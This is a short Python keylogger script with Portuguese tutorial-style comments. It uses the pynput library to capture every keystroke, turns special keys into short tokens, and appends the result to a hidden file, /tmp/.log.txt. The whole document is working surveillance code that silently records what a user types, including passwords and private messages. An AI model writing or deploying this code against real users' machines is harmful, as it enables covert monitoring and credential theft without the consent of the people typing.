#!/usr/bin/python3.5
#em pynput, importar o método Listener do teclado
from pynput.keyboard import Listener

#definir a localização do arquivo de log
logFile = "/tmp/.log.txt"

def writeLog(key):
    '''
    Esta função será responsável por receber a tecla pressionada
    via Listener e escrever no arquivo de log
    '''

    #dicionário com as teclas a serem traduzidas
    translate_keys = {
	"Key.tab": " [T] ",
	"Key.shift": " [Shift] ",
	"Key.ctrl": " [ctrl] ",
	"Key.left": ">",
	"Key.down": "V",
	"Key.up": "^",
	"Key.right": ">",
	"Key.space": " ",
        "Key.shift_r": " [s] ",
        "Key.shift_l": " [s] ",
        "Key.enter": "\n",
        "Key.alt": " [a] ",
        "Key.esc": " [e] ",
        "Key.cmd": " [cmd] ",
        "Key.caps_lock": " [cap] ",
    }

    #converter a tecla pressionada para string
    keydata = str(key)

    #remover as asplas simples que delimitam os caracteres
    keydata = keydata.replace("'", "")

    for key in translate_keys:
        #key recebe a chave do dicionário translate_keys
        #substituir a chave (key) pelo seu valor (translate_keys[key])
        keydata = keydata.replace(key, translate_keys[key])

    #abrir o arquivo de log no modo append
    with open(logFile, "a") as f:
        f.write(keydata)

#abrir o Listener do teclado e escutar o evento on_press
#quando o evento on_press ocorrer, chamar a função writeLog
with Listener(on_press=writeLog) as l:
    l.join()
